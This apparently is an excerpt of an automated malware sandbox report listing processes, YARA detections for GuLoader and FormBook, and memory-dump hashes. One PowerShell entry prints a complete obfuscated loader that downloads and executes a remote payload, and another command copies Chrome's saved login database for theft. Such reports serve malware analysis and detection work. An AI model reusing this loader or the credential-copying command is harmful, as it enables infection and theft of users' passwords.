                Imagebase:0x7ff741d30000
                File size:452'608 bytes
                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000C.00000002.2072484963.000001A8D5541000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Reputation:high
                Has exited:true

                Target ID:13
                Start time:01:50:12
                Start date:03/07/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:15
                Start time:01:50:19
                Start date:03/07/2024
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Concordal6.Uds && echo t"
                Imagebase:0x7ff6a9240000
                File size:289'792 bytes
                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:16
                Start time:03:49:20
                Start date:03/07/2024
                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Shoo: DamTKvldlP.tpsmorp1Unde2U.de ');$Skumredes=$Methodizing[0];$Asprout= (Jimmis 'ps,u$ ffgSpidlStiroBrasbAdozaRudilPa t:,espNCh pyS ydk iltr Me iAutot enpiN nnkGlobkUpcueR llrfor nE.iceDjuks Non=CataNSouteDksdwU og- eneOTeleb,egejTh seTarmc bu.tint, medlSDropyGirss.athtOpree,hormRock..ritNIridetroutModi.SengWKopieBeskbPrinCGiftl ,eri.yvteColin .nit');$Asprout+=$Myoplastic[1];Fluorideringen ($Asprout);Fluorideringen (Jimmis 'Sa.f$ EndNTidsyretskAu,irTykmiDesttUddaiemptkDybfkBoureNatirAfp,nDdedeInkls R,a.CaboHrodneno,taBlomdvac e BikrK,desAloe[ Lin$CalaN .eceBillu Konr.mbroTrykcPoliaCruenShamaVamplUnac1Iglo5Yaff1 Red]Peri=F,de$M,noH Co.oAzoro Au.spapieUntagCystoRverwMaci ');$Antilogical=Jimmis 'Nedl$ RakN Prey ,opktallrGadeiKonstVer iApatkSatsk uleOverrNontnKodeeInussBlou. In DGrafoSchww Rumn El l AfrogallaDen.d.aasFStr,iDis lCupeeUdrj(Tas,$Mo,lSCrumk K.vuHy,omKo,mrAgnoeTripdR steRandsCa.a,Mi.j$Coypt Lany AponFlokgFloweDyn.nPlind CareUnbo)S mp ';$tyngende=$Myoplastic[0];Fluorideringen (Jimmis 'Dagk$ChargH,rrlSprioklepb Bega SublJ.mb:beskBRevid scrl Beledgn rSamasDeci=Egen(Ha,fTPrikeOversSku,tIndh-bimaPV riaTurrtNycthL no Natu$ Prit PreyAgisnPladg ntie EurnPantdKnageBags) Vrl ');while (!$Bdlers) {Fluorideringen (Jimmis 'None$ U sgAffelBoploPsylbPengaBrunlHand: sabSGre,y killSanstDelae E.stStilj RhosAf.rk,agdr Udeu Bu.kImpukPraceTopm=Timb$TarptPog,rCoulust te.rbi ') ;Fluorideringen $Antilogical;Fluorideringen (Jimmis ' BarSOph.tHy,eaMangrAvertCh.r-TotaSCitrl.axieAfkleBadmpn,na Hove4Afha ');Fluorideringen (Jimmis ' Hyd$Convg Haal minoMultbK nta ucllAbno:rummBOutfdFortl TroeSkumrBlgesDist=Midt(AltsTKna.eGenisVeritBall-PatePToe.aNonmtTolkh Ri. .tvb$Sndet,epeyHal.nUrogg Forese snSvovdCradeS.bs)Inha ') ;Fluorideringen (Jimmis 'Stok$ etrgSucclSindo TigbRustaR nglA.ph:FiskGExter JetaVa,mm LaimTaleaspart UngePhoss.toc=drug$WishgJ.hnlTyveoBefubFen.a pojlSial:.kvaASu anUr,isKonft DertAuslemrkelMoh.sMe,heSy esDrn oKosmm RecrSl,daAt.laUnmidSno,eBa mtuds.sDepo+Co y+H,pa% Tri$AfmaMFre eEjentDog h DetoTr.ndSaltiHo,sz OmgiSwinnMortg ,il.DelecVaeroDetau Ye.nSquatVan ') ;$Skumredes=$Methodizing[$Grammates];}$Marmorgulvenes=308881;$Renhedsgraders=29541;Fluorideringen (Jimmis ' The$Arbeg Nu,l Jugo.rombHyloa Stol Cou:,riaSAadscTochynu hp.raph xoiReplfUdadoEnerrBattmArnk2Barn4Bra,5Af,a ,aug= For iliGKokuesttttBary-Kon CSvinoFejln Spit TreeumaanTvant Ind Beto$LinitMajoyOparnTordgE uieBannnStvld,etheSeis ');Fluorideringen (Jimmis ' Meg$AcclgKerblTrepo EnsbClinaHvidltrac:TeknUSillnDe,iaHa,pn,ejltUnliiT,syqSa,iuArenaAbr,tGenneTurvd Scl Mist= Alk pre,[ SegS Foly,abesFlyvt,ulpeSlagm.arj.CaddCPitcoSolbnRerov IndeUnh rLactt ira] Win: ete:FrakFD.ifrChi oM.ngmQuipBHypoa LilsRedhe St,6Sous4SlapSBnhrtTromr K riPropnAstigScus( Waa$H liSHou,cEtagyStnkpTheahFolkiIa,rfknudoProprAfgimSer,2Genn4Sp.r5Krum) Fri ');Fluorideringen (Jimmis 'Trip$StargRep,lOveroTylsbbesta UnplCoal:DigyBbrusoIn knBlreaass,iUnecrRusseTokr Ste.=Kili Mod[VirkS Ga,yImpusHypstGrfberelimElod. SutTFasaeS.atxu dat,jer.archEDogmnSlapc .inoPiledS.ggiFuninSmmegPh.s]Steg: ns: creAFakeSMalvCSn wI MetI m n.pos GEtagearchtUmidS engtAnstrAfskiCivinFilogRe a(Kerm$.ehjU.phenTonia AranTubat Da,iKl iqFondu heraA.amtDataeEnked ,or)Morb ');Fluorideringen (Jimmis 'Sulp$CestgPolylImmeoi.vobDiska Brul F.n:Hv,dP Bi.rresaiph,toOsterHicciRejet Srge StatSlidsForphL beaDetovUnevePigerSkleeJgernfaddsSk,a= Su.$UnwaBDev oAlarnprogaSpliiProtrMoldeRe.u.TrfssShapu I tbDeposTak tforbrVid i SphnGaargcor.(Harp$ ,erMAnneaWomarUnchm S.goForjrPedigFr,nuImpulFiscvkommeMellnPen eUr ts M.d,schm$MythRGentehus n arihfibeetjredVrngsGunsgNormrH.lba kardMo meWorkr Saus S.u)nabo ');Fluorideringen $Prioritetshaverens;"
                Imagebase:0x2b0000
                File size:433'152 bytes
                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000010.00000002.1850596565.00000000086A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000010.00000002.1839918830.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000010.00000002.1851059403.000000000C1B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                Reputation:high
                Has exited:true

                Target ID:17
                Start time:03:49:21
                Start date:03/07/2024
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Concordal6.Uds && echo t"
                Imagebase:0x410000
                File size:236'544 bytes
                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:19
                Start time:03:49:41
                Start date:03/07/2024
                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                Imagebase:0xf70000
                File size:516'608 bytes
                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:20
                Start time:03:49:41
                Start date:03/07/2024
                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                Imagebase:0xf70000
                File size:516'608 bytes
                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000014.00000002.1970441632.0000000006340000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                Reputation:high
                Has exited:true

                Target ID:22
                Start time:03:49:55
                Start date:03/07/2024
                Path:C:\Windows\explorer.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\Explorer.EXE
                Imagebase:0x7ff70ffd0000
                File size:5'141'208 bytes
                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000016.00000002.2539715422.000000000B32B000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                Reputation:high
                Has exited:false

                Target ID:25
                Start time:03:50:04
                Start date:03/07/2024
                Path:C:\Windows\SysWOW64\raserver.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\SysWOW64\raserver.exe"
                Imagebase:0xc80000
                File size:107'520 bytes
                MD5 hash:D1053D114847677185F248FF98C3F255
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:moderate
                Has exited:false

                Target ID:26
                Start time:03:50:10
                Start date:03/07/2024
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V
                Imagebase:0x410000
                File size:236'544 bytes
                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:27
                Start time:03:50:10
                Start date:03/07/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:28
                Start time:03:50:18
                Start date:03/07/2024
                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                Imagebase:0xf70000
                File size:516'608 bytes
                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:29
                Start time:03:50:21
                Start date:03/07/2024
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                Imagebase:0x7ff676730000
                File size:71'680 bytes
                MD5 hash:EF3179D498793BF4234F708D3BE28633
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:30
                Start time:03:50:22
                Start date:03/07/2024
                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                Imagebase:0x7ff722870000
                File size:676'768 bytes
                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:31
                Start time:03:50:27
                Start date:03/07/2024
                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                Imagebase:0xf70000
                File size:516'608 bytes
                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Has exited:true

                Reset < >
                  Memory Dump Source
                  • Source File: 0000000C.00000002.2102700575.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_7ffaab780000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7c47cc5b1dc179ae5c3829890e0cbcdcb449324acaa4af75c0a3439d362c5b08
                  • Instruction ID: ae3b126858fa9576d305c05b22b36572e93c3066c9c9ee9c2002709f442a11c0
                  • Opcode Fuzzy Hash: 7c47cc5b1dc179ae5c3829890e0cbcdcb449324acaa4af75c0a3439d362c5b08
                  • Instruction Fuzzy Hash: 5AF1D530509A8D8FEBA9DF28C8557F937E1FF55350F04826ED84DC72A1CB75A8858B81
                  Memory Dump Source
                  • Source File: 0000000C.00000002.2102700575.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_7ffaab780000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e95724b99d7d7562ff5ac9b51d42b70d291ce4b696d00a3847f8d15c445b65ee
                  • Instruction ID: 3b1046a78ea36cb88da3fe5ce107eaad1ad1a37f739772dba09aee4bbded150e
                  • Opcode Fuzzy Hash: e95724b99d7d7562ff5ac9b51d42b70d291ce4b696d00a3847f8d15c445b65ee
                  • Instruction Fuzzy Hash: 8AE1E431909A4D8FEBA8DF68C8557F93BE1FB55350F14826ED80DC72A1CB78A98487C1
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.2102700575.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_7ffaab780000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 6g$)_]I$9_]I
                  • API String ID: 0-3551986184
                  • Opcode ID: ee418488f46510dd13180c51af9b086cc47c47026540c1e73d30d5f2a93a9fc1
                  • Instruction ID: fca0f32793b98278b916d3d6777cef9321a9bd87358b1720111c4b102c7203b5
                  • Opcode Fuzzy Hash: ee418488f46510dd13180c51af9b086cc47c47026540c1e73d30d5f2a93a9fc1
                  • Instruction Fuzzy Hash: 52321731A0EA498FDB44DF9CC895AB87BF1FF65340B1481BAD04DC72A6CA64E885C7C1
                  Memory Dump Source
                  • Source File: 0000000C.00000002.2109255120.00007FFAAB850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB850000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_7ffaab850000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7415ee75ba5ef8bb1c77056549a233094de184e4432f30e8bd06e89123d23483
                  • Instruction ID: b93e4013272afe49a399fd2a0324cab4d7aca47072a2e503e29fe93072ea01d2
                  • Opcode Fuzzy Hash: 7415ee75ba5ef8bb1c77056549a233094de184e4432f30e8bd06e89123d23483
                  • Instruction Fuzzy Hash: 3FE10D7190EB8A8FE795DF1C88556B87BD1EF5A290F0842FED44DC71E3DA18A8498381
                  Memory Dump Source
                  • Source File: 0000000C.00000002.2109255120.00007FFAAB850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB850000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_7ffaab850000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 73da998b1b3b2aa9886b419fbf40c85712b93b6f737f82e4aa9f2b6c66502bae
                  • Instruction ID: 61c7b0e72fba7f99164e33cc868734770748c632fc225cb819594a930edaef85
                  • Opcode Fuzzy Hash: 73da998b1b3b2aa9886b419fbf40c85712b93b6f737f82e4aa9f2b6c66502bae
                  • Instruction Fuzzy Hash: 22D1296290EBC68FE796DF6C48145A47BD1EF5A290B0882FED44DC71A3DD18AC0983D1
                  Memory Dump Source
                  • Source File: 0000000C.00000002.2109255120.00007FFAAB850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB850000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_7ffaab850000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9fd4f5ea56de71938f94ca00c9d51fe4dddab0747b1f5dbaf5f30f7c3edd9a17
                  • Instruction ID: f9080e439685b668906228b057c187ba4867038aea58dca2e0eff3e3ce920e34
                  • Opcode Fuzzy Hash: 9fd4f5ea56de71938f94ca00c9d51fe4dddab0747b1f5dbaf5f30f7c3edd9a17
                  • Instruction Fuzzy Hash: 5651E66291EAC68FE7A5DF1C88516F86AD1EF5A290B5882FDD44DC71E3CD18A84C8381
                  Memory Dump Source
                  • Source File: 0000000C.00000002.2109255120.00007FFAAB850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB850000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_7ffaab850000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 650141c7184bfe3c97b1036994c28f6270ec853634ad66f4881e9d2aa30e8901
                  • Instruction ID: bc8f8e81516970343fd662f2b8a723d80d4fca14dd58f847cb04976116456dc1
                  • Opcode Fuzzy Hash: 650141c7184bfe3c97b1036994c28f6270ec853634ad66f4881e9d2aa30e8901
                  • Instruction Fuzzy Hash: 3E31E756D1FAD68BF3A6DF6C58111F86A81AF1A290B58C6FED44DC31E3DD087C0882D6
                  Memory Dump Source
                  • Source File: 0000000C.00000002.2102700575.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_7ffaab780000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                  • Instruction ID: 8c8fc582682be1b12c24dacad0429513c2659b4e3e17000d35920b217d6041a5
                  • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                  • Instruction Fuzzy Hash: 0501677111CB0C8FD748EF0CE451AB5B7E0FB95364F10056DE58AC3661DA36E882CB45
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.2102700575.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_7ffaab780000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: N_^$N_^$N_^$N_^$N_^$N_^
                  • API String ID: 0-1364355708
                  • Opcode ID: e4cbbcd6a414762815a1364fec2f44a043f53ebd319ef0804ac580de4f13ba8e
                  • Instruction ID: f4df24c8c5b62c55923d57bc30e5fa8c3a750efa19b3dfa8afff462339020fc7
                  • Opcode Fuzzy Hash: e4cbbcd6a414762815a1364fec2f44a043f53ebd319ef0804ac580de4f13ba8e
                  • Instruction Fuzzy Hash: A82127A3C1BFC5CBD31A03A89CA50F43F70EF06795B0841B6C4AA1B073EE24255B4182
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.1835233400.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_4740000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: \V/k
                  • API String ID: 0-13811129
                  • Opcode ID: 09ce5dacf9d26f851f6e1ea0bf81bd06f09461da7d58462a7fd5021a65aee385
                  • Instruction ID: e208a1f48b6093a8f5e5be9d391624b6396e82e1682080753ca8e1f1390913f9
                  • Opcode Fuzzy Hash: 09ce5dacf9d26f851f6e1ea0bf81bd06f09461da7d58462a7fd5021a65aee385
                  • Instruction Fuzzy Hash: 99B14F70E00209DFDF14CFA9D9857AEBBF2AF88314F148529D815E7394EB74A845CB81
                  Memory Dump Source
                  • Source File: 00000010.00000002.1835233400.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_4740000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 165503a8dc987b8e9ab209836b5bd269a34697ac097b47edcd19b7ab268310ac
